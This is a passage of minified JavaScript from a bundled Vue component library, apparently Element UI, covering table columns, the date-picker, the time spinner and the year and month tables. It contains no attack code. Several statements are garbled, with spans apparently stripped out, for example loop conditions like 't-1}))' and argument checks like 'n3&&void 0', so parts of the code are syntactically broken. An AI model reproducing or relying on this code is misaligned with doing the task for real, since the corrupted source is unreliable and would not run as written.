0===n?"children":n;this.store=fs(this,{rowKey:this.rowKey,defaultExpandAll:this.defaultExpandAll,selectOnIndeterminate:this.selectOnIndeterminate,indent:this.indent,lazy:this.lazy,lazyColumnIdentifier:i,childrenColumnName:s});var r=new _s({store:this.store,table:this,fit:this.fit,showHeader:this.showHeader});return{layout:r,isHidden:!1,renderExpanded:null,resizeProxyVisible:!1,resizeState:{width:null,height:null},isGroup:!1,scrollPosition:"left"}}},Ys=qs,Ks=o(Ys,Pn,Mn,!1,null,null,null);Ks.options.__file="packages/table/src/table.vue";var Us=Ks.exports;Us.install=function(e){e.component(Us.name,Us)};var Gs=Us,Xs={default:{order:""},selection:{width:48,minWidth:48,realWidth:48,order:"",className:"el-table-column--selection"},expand:{width:48,minWidth:48,realWidth:48,order:""},index:{width:48,minWidth:48,realWidth:48,order:""}},Zs={selection:{renderHeader:function(e,t){var i=t.store;return e("el-checkbox",{attrs:{disabled:i.states.data&&0===i.states.data.length,indeterminate:i.states.selection.length>0&&!this.isAllSelected,value:this.isAllSelected},on:{input:this.toggleAllSelection}})},renderCell:function(e,t){var i=t.row,n=t.column,s=t.isSelected,r=t.store,a=t.$index;return e("el-checkbox",{nativeOn:{click:function(e){return e.stopPropagation()}},attrs:{value:s,disabled:!!n.selectable&&!n.selectable.call(null,i,a)},on:{input:function(){r.commit("rowSelectedChanged",i)}}})},sortable:!1,resizable:!1},index:{renderHeader:function(e,t){var i=t.column;return i.label||"#"},renderCell:function(e,t){var i=t.$index,n=t.column,s=i+1,r=n.index;return"number"===typeof r?s=i+r:"function"===typeof r&&(s=r(i)),e("div",[s])},sortable:!1},expand:{renderHeader:function(e,t){var i=t.column;return i.label||""},renderCell:function(e,t){var i=t.row,n=t.store,s=t.isExpanded,r=["el-table__expand-icon"];s&&r.push("el-table__expand-icon--expanded");var a=function(e){e.stopPropagation(),n.toggleRowExpansion(i)};return e("div",{class:r,on:{click:a}},[e("i",{class:"el-icon el-icon-arrow-right"})])},sortable:!1,resizable:!1,className:"el-table__expand-column"}};function Qs(e,t){var i=t.row,n=t.column,s=t.$index,r=n.property,a=r&&Object(b["getPropByPath"])(i,r).v;return n&&n.formatter?n.formatter(i,n,a,s):a}function Js(e,t){var i=t.row,n=t.treeNode,s=t.store;if(!n)return null;var r=[],a=function(e){e.stopPropagation(),s.loadOrToggle(i)};if(n.indent&&r.push(e("span",{class:"el-table__indent",style:{"padding-left":n.indent+"px"}})),"boolean"!==typeof n.expanded||n.noLazyChildren)r.push(e("span",{class:"el-table__placeholder"}));else{var o=["el-table__expand-icon",n.expanded?"el-table__expand-icon--expanded":""],l=["el-icon-arrow-right"];n.loading&&(l=["el-icon-loading"]),r.push(e("div",{class:o,on:{click:a}},[e("i",{class:l})]))}return r}var er=Object.assign||function(e){for(var t=1;t-1}))}}},data:function(){return{isSubColumn:!1,columns:[]}},computed:{owner:function(){var e=this.$parent;while(e&&!e.tableId)e=e.$parent;return e},columnOrTableParent:function(){var e=this.$parent;while(e&&!e.tableId&&!e.columnId)e=e.$parent;return e},realWidth:function(){return es(this.width)},realMinWidth:function(){return ts(this.minWidth)},realAlign:function(){return this.align?"is-"+this.align:null},realHeaderAlign:function(){return this.headerAlign?"is-"+this.headerAlign:this.realAlign}},methods:{getPropsData:function(){for(var e=this,t=arguments.length,i=Array(t),n=0;n3&&void 0!==arguments[3]?arguments[3]:"-";if(!e)return null;var s=(fr[i]||fr["default"]).parser,r=t||lr[i];return s(e,r,n)},gr=function(e,t,i){if(!e)return null;var n=(fr[i]||fr["default"]).formatter,s=t||lr[i];return n(e,s)},br=function(e,t){var i=function(e,t){var i=e instanceof Date,n=t instanceof Date;return i&&n?e.getTime()===t.getTime():!i&&!n&&e===t},n=e instanceof Array,s=t instanceof Array;return n&&s?e.length===t.length&&e.every((function(e,n){return i(e,t[n])})):!n&&!s&&i(e,t)},yr=function(e){return"string"===typeof e||e instanceof String},_r=function(e){return null===e||void 0===e||yr(e)||Array.isArray(e)&&2===e.length&&e.every(yr)},xr={mixins:[O.a,or],inject:{elForm:{default:""},elFormItem:{default:""}},props:{size:String,format:String,valueFormat:String,readonly:Boolean,placeholder:String,startPlaceholder:String,endPlaceholder:String,prefixIcon:String,clearIcon:{type:String,default:"el-icon-circle-close"},name:{default:"",validator:_r},disabled:Boolean,clearable:{type:Boolean,default:!0},id:{default:"",validator:_r},popperClass:String,editable:{type:Boolean,default:!0},align:{type:String,default:"left"},value:{},defaultValue:{},defaultTime:{},rangeSeparator:{default:"-"},pickerOptions:{},unlinkPanels:Boolean,validateEvent:{type:Boolean,default:!0}},components:{ElInput:m.a},directives:{Clickoutside:V.a},data:function(){return{pickerVisible:!1,showClose:!1,userInput:null,valueOnOpen:null,unwatchPickerOptions:null}},watch:{pickerVisible:function(e){this.readonly||this.pickerDisabled||(e?(this.showPicker(),this.valueOnOpen=Array.isArray(this.value)?[].concat(this.value):this.value):(this.hidePicker(),this.emitChange(this.value),this.userInput=null,this.validateEvent&&this.dispatch("ElFormItem","el.form.blur"),this.$emit("blur",this),this.blur()))},parsedValue:{immediate:!0,handler:function(e){this.picker&&(this.picker.value=e)}},defaultValue:function(e){this.picker&&(this.picker.defaultValue=e)},value:function(e,t){br(e,t)||this.pickerVisible||!this.validateEvent||this.dispatch("ElFormItem","el.form.change",e)}},computed:{ranged:function(){return this.type.indexOf("range")>-1},reference:function(){var e=this.$refs.reference;return e.$el||e},refInput:function(){return this.reference?[].slice.call(this.reference.querySelectorAll("input")):[]},valueIsEmpty:function(){var e=this.value;if(Array.isArray(e)){for(var t=0,i=e.length;t0&&void 0!==arguments[0]?arguments[0]:"",i=arguments.length>1&&void 0!==arguments[1]&&arguments[1];e.userInput=null,e.pickerVisible=e.picker.visible=i,e.emitInput(t),e.picker.resetView&&e.picker.resetView()})),this.picker.$on("select-range",(function(t,i,n){0!==e.refInput.length&&(n&&"min"!==n?"max"===n&&(e.refInput[1].setSelectionRange(t,i),e.refInput[1].focus()):(e.refInput[0].setSelectionRange(t,i),e.refInput[0].focus()))}))},unmountPicker:function(){this.picker&&(this.picker.$destroy(),this.picker.$off(),"function"===typeof this.unwatchPickerOptions&&this.unwatchPickerOptions(),this.picker.$el.parentNode.removeChild(this.picker.$el))},emitChange:function(e){br(e,this.valueOnOpen)||(this.$emit("change",e),this.valueOnOpen=e,this.validateEvent&&this.dispatch("ElFormItem","el.form.change",e))},emitInput:function(e){var t=this.formatToValue(e);br(this.value,t)||this.$emit("input",t)},isValidValue:function(e){return this.picker||this.mountPicker(),!this.picker.isValidValue||e&&this.picker.isValidValue(e)}}},Cr=xr,wr=o(Cr,sr,rr,!1,null,null,null);wr.options.__file="packages/date-picker/src/picker.vue";var kr=wr.exports,Sr=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-enter":e.handleEnter,"after-leave":e.handleLeave}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-picker-panel el-date-picker el-popper",class:[{"has-sidebar":e.$slots.sidebar||e.shortcuts,"has-time":e.showTime},e.popperClass]},[i("div",{staticClass:"el-picker-panel__body-wrapper"},[e._t("sidebar"),e.shortcuts?i("div",{staticClass:"el-picker-panel__sidebar"},e._l(e.shortcuts,(function(t,n){return i("button",{key:n,staticClass:"el-picker-panel__shortcut",attrs:{type:"button"},on:{click:function(i){e.handleShortcutClick(t)}}},[e._v(e._s(t.text))])})),0):e._e(),i("div",{staticClass:"el-picker-panel__body"},[e.showTime?i("div",{staticClass:"el-date-picker__time-header"},[i("span",{staticClass:"el-date-picker__editor-wrap"},[i("el-input",{attrs:{placeholder:e.t("el.datepicker.selectDate"),value:e.visibleDate,size:"small"},on:{input:function(t){return e.userInputDate=t},change:e.handleVisibleDateChange}})],1),i("span",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleTimePickClose,expression:"handleTimePickClose"}],staticClass:"el-date-picker__editor-wrap"},[i("el-input",{ref:"input",attrs:{placeholder:e.t("el.datepicker.selectTime"),value:e.visibleTime,size:"small"},on:{focus:function(t){e.timePickerVisible=!0},input:function(t){return e.userInputTime=t},change:e.handleVisibleTimeChange}}),i("time-picker",{ref:"timepicker",attrs:{"time-arrow-control":e.arrowControl,visible:e.timePickerVisible},on:{pick:e.handleTimePick,mounted:e.proxyTimePickerDataProperties}})],1)]):e._e(),i("div",{directives:[{name:"show",rawName:"v-show",value:"time"!==e.currentView,expression:"currentView !== 'time'"}],staticClass:"el-date-picker__header",class:{"el-date-picker__header--bordered":"year"===e.currentView||"month"===e.currentView}},[i("button",{staticClass:"el-picker-panel__icon-btn el-date-picker__prev-btn el-icon-d-arrow-left",attrs:{type:"button","aria-label":e.t("el.datepicker.prevYear")},on:{click:e.prevYear}}),i("button",{directives:[{name:"show",rawName:"v-show",value:"date"===e.currentView,expression:"currentView === 'date'"}],staticClass:"el-picker-panel__icon-btn el-date-picker__prev-btn el-icon-arrow-left",attrs:{type:"button","aria-label":e.t("el.datepicker.prevMonth")},on:{click:e.prevMonth}}),i("span",{staticClass:"el-date-picker__header-label",attrs:{role:"button"},on:{click:e.showYearPicker}},[e._v(e._s(e.yearLabel))]),i("span",{directives:[{name:"show",rawName:"v-show",value:"date"===e.currentView,expression:"currentView === 'date'"}],staticClass:"el-date-picker__header-label",class:{active:"month"===e.currentView},attrs:{role:"button"},on:{click:e.showMonthPicker}},[e._v(e._s(e.t("el.datepicker.month"+(e.month+1))))]),i("button",{staticClass:"el-picker-panel__icon-btn el-date-picker__next-btn el-icon-d-arrow-right",attrs:{type:"button","aria-label":e.t("el.datepicker.nextYear")},on:{click:e.nextYear}}),i("button",{directives:[{name:"show",rawName:"v-show",value:"date"===e.currentView,expression:"currentView === 'date'"}],staticClass:"el-picker-panel__icon-btn el-date-picker__next-btn el-icon-arrow-right",attrs:{type:"button","aria-label":e.t("el.datepicker.nextMonth")},on:{click:e.nextMonth}})]),i("div",{staticClass:"el-picker-panel__content"},[i("date-table",{directives:[{name:"show",rawName:"v-show",value:"date"===e.currentView,expression:"currentView === 'date'"}],attrs:{"selection-mode":e.selectionMode,"first-day-of-week":e.firstDayOfWeek,value:e.value,"default-value":e.defaultValue?new Date(e.defaultValue):null,date:e.date,"cell-class-name":e.cellClassName,"disabled-date":e.disabledDate},on:{pick:e.handleDatePick}}),i("year-table",{directives:[{name:"show",rawName:"v-show",value:"year"===e.currentView,expression:"currentView === 'year'"}],attrs:{value:e.value,"default-value":e.defaultValue?new Date(e.defaultValue):null,date:e.date,"disabled-date":e.disabledDate},on:{pick:e.handleYearPick}}),i("month-table",{directives:[{name:"show",rawName:"v-show",value:"month"===e.currentView,expression:"currentView === 'month'"}],attrs:{value:e.value,"default-value":e.defaultValue?new Date(e.defaultValue):null,date:e.date,"disabled-date":e.disabledDate},on:{pick:e.handleMonthPick}})],1)])],2),i("div",{directives:[{name:"show",rawName:"v-show",value:e.footerVisible&&"date"===e.currentView,expression:"footerVisible && currentView === 'date'"}],staticClass:"el-picker-panel__footer"},[i("el-button",{directives:[{name:"show",rawName:"v-show",value:"dates"!==e.selectionMode,expression:"selectionMode !== 'dates'"}],staticClass:"el-picker-panel__link-btn",attrs:{size:"mini",type:"text"},on:{click:e.changeToNow}},[e._v("\n "+e._s(e.t("el.datepicker.now"))+"\n ")]),i("el-button",{staticClass:"el-picker-panel__link-btn",attrs:{plain:"",size:"mini"},on:{click:e.confirm}},[e._v("\n "+e._s(e.t("el.datepicker.confirm"))+"\n ")])],1)])])},Dr=[];Sr._withStripped=!0;var $r=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":function(t){e.$emit("dodestroy")}}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-time-panel el-popper",class:e.popperClass},[i("div",{staticClass:"el-time-panel__content",class:{"has-seconds":e.showSeconds}},[i("time-spinner",{ref:"spinner",attrs:{"arrow-control":e.useArrow,"show-seconds":e.showSeconds,"am-pm-mode":e.amPmMode,date:e.date},on:{change:e.handleChange,"select-range":e.setSelectionRange}})],1),i("div",{staticClass:"el-time-panel__footer"},[i("button",{staticClass:"el-time-panel__btn cancel",attrs:{type:"button"},on:{click:e.handleCancel}},[e._v(e._s(e.t("el.datepicker.cancel")))]),i("button",{staticClass:"el-time-panel__btn",class:{confirm:!e.disabled},attrs:{type:"button"},on:{click:function(t){e.handleConfirm()}}},[e._v(e._s(e.t("el.datepicker.confirm")))])])])])},Or=[];$r._withStripped=!0;var Er=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-time-spinner",class:{"has-seconds":e.showSeconds}},[e.arrowControl?e._e():[i("el-scrollbar",{ref:"hours",staticClass:"el-time-spinner__wrapper",attrs:{"wrap-style":"max-height: inherit;","view-class":"el-time-spinner__list",noresize:"",tag:"ul"},nativeOn:{mouseenter:function(t){e.emitSelectRange("hours")},mousemove:function(t){e.adjustCurrentSpinner("hours")}}},e._l(e.hoursList,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:n===e.hours,disabled:t},on:{click:function(i){e.handleClick("hours",{value:n,disabled:t})}}},[e._v(e._s(("0"+(e.amPmMode?n%12||12:n)).slice(-2))+e._s(e.amPm(n)))])})),0),i("el-scrollbar",{ref:"minutes",staticClass:"el-time-spinner__wrapper",attrs:{"wrap-style":"max-height: inherit;","view-class":"el-time-spinner__list",noresize:"",tag:"ul"},nativeOn:{mouseenter:function(t){e.emitSelectRange("minutes")},mousemove:function(t){e.adjustCurrentSpinner("minutes")}}},e._l(e.minutesList,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:n===e.minutes,disabled:!t},on:{click:function(t){e.handleClick("minutes",{value:n,disabled:!1})}}},[e._v(e._s(("0"+n).slice(-2)))])})),0),i("el-scrollbar",{directives:[{name:"show",rawName:"v-show",value:e.showSeconds,expression:"showSeconds"}],ref:"seconds",staticClass:"el-time-spinner__wrapper",attrs:{"wrap-style":"max-height: inherit;","view-class":"el-time-spinner__list",noresize:"",tag:"ul"},nativeOn:{mouseenter:function(t){e.emitSelectRange("seconds")},mousemove:function(t){e.adjustCurrentSpinner("seconds")}}},e._l(60,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:n===e.seconds},on:{click:function(t){e.handleClick("seconds",{value:n,disabled:!1})}}},[e._v(e._s(("0"+n).slice(-2)))])})),0)],e.arrowControl?[i("div",{staticClass:"el-time-spinner__wrapper is-arrow",on:{mouseenter:function(t){e.emitSelectRange("hours")}}},[i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.decrease,expression:"decrease"}],staticClass:"el-time-spinner__arrow el-icon-arrow-up"}),i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.increase,expression:"increase"}],staticClass:"el-time-spinner__arrow el-icon-arrow-down"}),i("ul",{ref:"hours",staticClass:"el-time-spinner__list"},e._l(e.arrowHourList,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:t===e.hours,disabled:e.hoursList[t]}},[e._v(e._s(void 0===t?"":("0"+(e.amPmMode?t%12||12:t)).slice(-2)+e.amPm(t)))])})),0)]),i("div",{staticClass:"el-time-spinner__wrapper is-arrow",on:{mouseenter:function(t){e.emitSelectRange("minutes")}}},[i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.decrease,expression:"decrease"}],staticClass:"el-time-spinner__arrow el-icon-arrow-up"}),i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.increase,expression:"increase"}],staticClass:"el-time-spinner__arrow el-icon-arrow-down"}),i("ul",{ref:"minutes",staticClass:"el-time-spinner__list"},e._l(e.arrowMinuteList,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:t===e.minutes}},[e._v("\n "+e._s(void 0===t?"":("0"+t).slice(-2))+"\n ")])})),0)]),e.showSeconds?i("div",{staticClass:"el-time-spinner__wrapper is-arrow",on:{mouseenter:function(t){e.emitSelectRange("seconds")}}},[i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.decrease,expression:"decrease"}],staticClass:"el-time-spinner__arrow el-icon-arrow-up"}),i("i",{directives:[{name:"repeat-click",rawName:"v-repeat-click",value:e.increase,expression:"increase"}],staticClass:"el-time-spinner__arrow el-icon-arrow-down"}),i("ul",{ref:"seconds",staticClass:"el-time-spinner__list"},e._l(e.arrowSecondList,(function(t,n){return i("li",{key:n,staticClass:"el-time-spinner__item",class:{active:t===e.seconds}},[e._v("\n "+e._s(void 0===t?"":("0"+t).slice(-2))+"\n ")])})),0)]):e._e()]:e._e()],2)},Tr=[];Er._withStripped=!0;var Pr={components:{ElScrollbar:q.a},directives:{repeatClick:It},props:{date:{},defaultValue:{},showSeconds:{type:Boolean,default:!0},arrowControl:Boolean,amPmMode:{type:String,default:""}},computed:{hours:function(){return this.date.getHours()},minutes:function(){return this.date.getMinutes()},seconds:function(){return this.date.getSeconds()},hoursList:function(){return Object(ar["getRangeHours"])(this.selectableRange)},minutesList:function(){return Object(ar["getRangeMinutes"])(this.selectableRange,this.hours)},arrowHourList:function(){var e=this.hours;return[e>0?e-1:void 0,e,e<23?e+1:void 0]},arrowMinuteList:function(){var e=this.minutes;return[e>0?e-1:void 0,e,e<59?e+1:void 0]},arrowSecondList:function(){var e=this.seconds;return[e>0?e-1:void 0,e,e<59?e+1:void 0]}},data:function(){return{selectableRange:[],currentScrollbar:null}},mounted:function(){var e=this;this.$nextTick((function(){!e.arrowControl&&e.bindScrollEvent()}))},methods:{increase:function(){this.scrollDown(1)},decrease:function(){this.scrollDown(-1)},modifyDateField:function(e,t){switch(e){case"hours":this.$emit("change",Object(ar["modifyTime"])(this.date,t,this.minutes,this.seconds));break;case"minutes":this.$emit("change",Object(ar["modifyTime"])(this.date,this.hours,t,this.seconds));break;case"seconds":this.$emit("change",Object(ar["modifyTime"])(this.date,this.hours,this.minutes,t));break}},handleClick:function(e,t){var i=t.value,n=t.disabled;n||(this.modifyDateField(e,i),this.emitSelectRange(e),this.adjustSpinner(e,i))},emitSelectRange:function(e){"hours"===e?this.$emit("select-range",0,2):"minutes"===e?this.$emit("select-range",3,5):"seconds"===e&&this.$emit("select-range",6,8),this.currentScrollbar=e},bindScrollEvent:function(){var e=this,t=function(t){e.$refs[t].wrap.onscroll=function(i){e.handleScroll(t,i)}};t("hours"),t("minutes"),t("seconds")},handleScroll:function(e){var t=Math.min(Math.round((this.$refs[e].wrap.scrollTop-(.5*this.scrollBarHeight(e)-10)/this.typeItemHeight(e)+3)/this.typeItemHeight(e)),"hours"===e?23:59);this.modifyDateField(e,t)},adjustSpinners:function(){this.adjustSpinner("hours",this.hours),this.adjustSpinner("minutes",this.minutes),this.adjustSpinner("seconds",this.seconds)},adjustCurrentSpinner:function(e){this.adjustSpinner(e,this[e])},adjustSpinner:function(e,t){if(!this.arrowControl){var i=this.$refs[e].wrap;i&&(i.scrollTop=Math.max(0,t*this.typeItemHeight(e)))}},scrollDown:function(e){var t=this;this.currentScrollbar||this.emitSelectRange("hours");var i=this.currentScrollbar,n=this.hoursList,s=this[i];if("hours"===this.currentScrollbar){var r=Math.abs(e);e=e>0?1:-1;var a=n.length;while(a--&&r)s=(s+e+n.length)%n.length,n[s]||r--;if(n[s])return}else s=(s+e+60)%60;this.modifyDateField(i,s),this.adjustSpinner(i,s),this.$nextTick((function(){return t.emitSelectRange(t.currentScrollbar)}))},amPm:function(e){var t="a"===this.amPmMode.toLowerCase();if(!t)return"";var i="A"===this.amPmMode,n=e<12?" am":" pm";return i&&(n=n.toUpperCase()),n},typeItemHeight:function(e){return this.$refs[e].$el.querySelector("li").offsetHeight},scrollBarHeight:function(e){return this.$refs[e].$el.offsetHeight}}},Mr=Pr,Nr=o(Mr,Er,Tr,!1,null,null,null);Nr.options.__file="packages/date-picker/src/basic/time-spinner.vue";var Ir=Nr.exports,jr={mixins:[g.a],components:{TimeSpinner:Ir},props:{visible:Boolean,timeArrowControl:Boolean},watch:{visible:function(e){var t=this;e?(this.oldValue=this.value,this.$nextTick((function(){return t.$refs.spinner.emitSelectRange("hours")}))):this.needInitAdjust=!0},value:function(e){var t=this,i=void 0;e instanceof Date?i=Object(ar["limitTimeRange"])(e,this.selectableRange,this.format):e||(i=this.defaultValue?new Date(this.defaultValue):new Date),this.date=i,this.visible&&this.needInitAdjust&&(this.$nextTick((function(e){return t.adjustSpinners()})),this.needInitAdjust=!1)},selectableRange:function(e){this.$refs.spinner.selectableRange=e},defaultValue:function(e){Object(ar["isDate"])(this.value)||(this.date=e?new Date(e):new Date)}},data:function(){return{popperClass:"",format:"HH:mm:ss",value:"",defaultValue:null,date:new Date,oldValue:new Date,selectableRange:[],selectionRange:[0,2],disabled:!1,arrowControl:!1,needInitAdjust:!0}},computed:{showSeconds:function(){return-1!==(this.format||"").indexOf("ss")},useArrow:function(){return this.arrowControl||this.timeArrowControl||!1},amPmMode:function(){return-1!==(this.format||"").indexOf("A")?"A":-1!==(this.format||"").indexOf("a")?"a":""}},methods:{handleCancel:function(){this.$emit("pick",this.oldValue,!1)},handleChange:function(e){this.visible&&(this.date=Object(ar["clearMilliseconds"])(e),this.isValidValue(this.date)&&this.$emit("pick",this.date,!0))},setSelectionRange:function(e,t){this.$emit("select-range",e,t),this.selectionRange=[e,t]},handleConfirm:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=arguments[1];if(!t){var i=Object(ar["clearMilliseconds"])(Object(ar["limitTimeRange"])(this.date,this.selectableRange,this.format));this.$emit("pick",i,e,t)}},handleKeydown:function(e){var t=e.keyCode,i={38:-1,40:1,37:-1,39:1};if(37===t||39===t){var n=i[t];return this.changeSelectionRange(n),void e.preventDefault()}if(38===t||40===t){var s=i[t];return this.$refs.spinner.scrollDown(s),void e.preventDefault()}},isValidValue:function(e){return Object(ar["timeWithinRange"])(e,this.selectableRange,this.format)},adjustSpinners:function(){return this.$refs.spinner.adjustSpinners()},changeSelectionRange:function(e){var t=[0,3].concat(this.showSeconds?[6]:[]),i=["hours","minutes"].concat(this.showSeconds?["seconds"]:[]),n=t.indexOf(this.selectionRange[0]),s=(n+e+t.length)%t.length;this.$refs.spinner.emitSelectRange(i[s])}},mounted:function(){var e=this;this.$nextTick((function(){return e.handleConfirm(!0,!0)})),this.$emit("mounted")}},Fr=jr,Lr=o(Fr,$r,Or,!1,null,null,null);Lr.options.__file="packages/date-picker/src/panel/time.vue";var Ar=Lr.exports,Vr=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("table",{staticClass:"el-year-table",on:{click:e.handleYearTableClick}},[i("tbody",[i("tr",[i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+0)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+1)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+1))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+2)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+2))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+3)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+3))])])]),i("tr",[i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+4)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+4))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+5)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+5))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+6)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+6))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+7)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+7))])])]),i("tr",[i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+8)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+8))])]),i("td",{staticClass:"available",class:e.getCellStyle(e.startYear+9)},[i("a",{staticClass:"cell"},[e._v(e._s(e.startYear+9))])]),i("td"),i("td")])])])},Br=[];Vr._withStripped=!0;var zr=function(e){var t=Object(ar["getDayCountOfYear"])(e),i=new Date(e,0,1);return Object(ar["range"])(t).map((function(e){return Object(ar["nextDate"])(i,e)}))},Rr={props:{disabledDate:{},value:{},defaultValue:{validator:function(e){return null===e||e instanceof Date&&Object(ar["isDate"])(e)}},date:{}},computed:{startYear:function(){return 10*Math.floor(this.date.getFullYear()/10)}},methods:{getCellStyle:function(e){var t={},i=new Date;return t.disabled="function"===typeof this.disabledDate&&zr(e).every(this.disabledDate),t.current=Object(b["arrayFindIndex"])(Object(b["coerceTruthyValueToArray"])(this.value),(function(t){return t.getFullYear()===e}))>=0,t.today=i.getFullYear()===e,t.default=this.defaultValue&&this.defaultValue.getFullYear()===e,t},handleYearTableClick:function(e){var t=e.target;if("A"===t.tagName){if(Object(Ae["hasClass"])(t.parentNode,"disabled"))return;var i=t.textContent||t.innerText;this.$emit("pick",Number(i))}}}},Hr=Rr,Wr=o(Hr,Vr,Br,!1,null,null,null);Wr.options.__file="packages/date-picker/src/basic/year-table.vue";var qr=Wr.exports,Yr=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("table",{staticClass:"el-month-table",on:{click:e.handleMonthTableClick,mousemove:e.handleMouseMove}},[i("tbody",e._l(e.rows,(function(t,n){return i("tr",{key:n},e._l(t,(function(t,n){return i("td",{key:n,class:e.getCellStyle(t)},[i("div",[i("a",{staticClass:"cell"},[e._v(e._s(e.t("el.datepicker.months."+e.months[t.text])))])])])})),0)})),0)])},Kr=[];Yr._withStripped=!0;var Ur=function(e,t){var i=Object(ar["getDayCountOfMonth"])(e,t),n=new Date(e,t,1);return Object(ar["range"])(i).map((function(e){return Object(ar["nextDate"])(n,e)}))},Gr=function(e){return new Date(e.getFullYear(),e.getMonth())},Xr=function(e){return"number"===typeof e||"string"===typeof e?Gr(new Date(e)).getTime():e instanceof Date?Gr(e).getTime():NaN},Zr={props:{disabledDate:{},value:{},selectionMode:{default:"month"},minDate:{},maxDate:{},defaultValue:{validator:function(e){return null===e||Object(ar["isDate"])(e)||Array.isArray(e)&&e.every(ar["isDate"])}},date:{},rangeState:{default:function(){return{endDate:null,selecting:!1}}}},mixins:[g.a],watch:{"rangeState.endDate":function(e){this.markRange(this.minDate,e)},minDate:function(e,t){Xr(e)!==Xr(t)&&this.markRange(this.minDate,this.maxDate)},maxDate:function(e,t){Xr(e)!==Xr(t)&&this.markRange(this.minDate,this.maxDate)}},data:function(){return{months:["jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"],tableRows:[[],[],[]],lastRow:null,lastColumn:null}},methods:{cellMatchesDate:function(e,t){var i=new Date(t);return this.date.getFullYear()===i.getFullYear()&&Number(e.text)===i.getMonth()},getCellStyle:function(e){var t=this,i={},n=this.date.getFullYear(),s=new Date,r=e.text,a=this.defaultValue?Array.isArray(this.defaultValue)?this.defaultValue:[this.defaultValue]:[];return i.disabled="function"===typeof this.disabledDate&&Ur(n,r).every(this.disabledDate),i.current=Object(b["arrayFindIndex"])(Object(b["coerceTruthyValueToArray"])(this.value),(function(e){return e.getFullYear()===n&&e.getMonth()===r}))>=0,i.today=s.getFullYear()===n&&s.getMonth()===r,i.default=a.some((function(i){return t.cellMatchesDate(e,i)})),e.inRange&&(i["in-range"]=!0,e.start&&(i["start-date"]=!0),e.end&&(i["end-date"]=!0)),i},getMonthOfCell:function(e){var t=this.date.getFullYear();return new Date(t,e,1)},markRange:function(e,t){e=Xr(e),t=Xr(t)||e;var i=[Math.min(e,t),Math.max(e,t)];e=i[0],t=i[1];for(var n=this.rows,s=0,r=n.length;s=e&&h<=t,c.start=e&&h===e,c.end=t&&h===t}},handleMouseMove:function(e){if(this.rangeState.selecting){var t=e.target;if("A"===t.tagName&&(t=t.parentNode.parentNode),"DIV"===t.tagName&&(t=t.parentNode),"TD"===t.tagName){var i=t.parentNode.rowIndex,n=t.cellIndex;this.rows[i][n].disabled||i===this.lastRow&&n===this.lastColumn||(this.lastRow=i,this.lastColumn=n,this.$emit("changerange",{minDate:this.minDate,maxDate:this.maxDate,rangeState:{selecting:!0,endDate:this.getMonthOfCell(4*i+n)}}))}}},handleMonthTableClick:function(e){var t=e.target;if("A"===t.tagName&&(t=t.parentNode.parentNode),"DIV"===t.tagName&&(t=t.parentNode),"TD"===t.tagName&&!Object(Ae["hasClass"])(t,"disabled")){var i=t.cellIndex,n=t.parentNode.rowIndex,s=4*n+i,r=this.getMonthOfCell(s);"range"===this.selectionMode?this.rangeState.selecting?(r>=this.minDate?this.$emit("pick",{minDate:this.minDate,maxDate:r}):this.$emit("pick",{minDate:r,maxDate:this.minDate}),this.rangeState.selecting=!1):(this.$emit("pick",{minDate:r,maxDate:null}),this.rangeState.selecting=!0):this.$emit("pick",s)}}},computed:{rows:function(){for(var e=this,t=this.tableRows,i=this.disabledDate,n=[],s=Xr(new Date),r=0;r<3;r++)for(var a=t[r],o=function(t){var o=a[t];o||(o={row:r,column:t,type:"normal",inRange:!1,start:!1,end:!1}),o.type="normal";var l=4*r+t,c=new Date(e.date.getFullYear(),l).getTime();o.inRange=c>=Xr(e.minDate)&&c<=Xr(e.maxDate),o.start=e.minDate&&c===Xr(e.minDate),o.end=e.maxDate&&c===Xr(e.maxDate);var u=c===s;u&&(o.type="today"),o.text=l;var h=new Date(c);o.disabled="function"===typeof i&&i(h),o.selected=Object(b["arrayFind"])(n,(function(e){return e.getTime()===h.getTime()})),e.$set(a,t,o)},l=0;l<4;l++)o(l);return 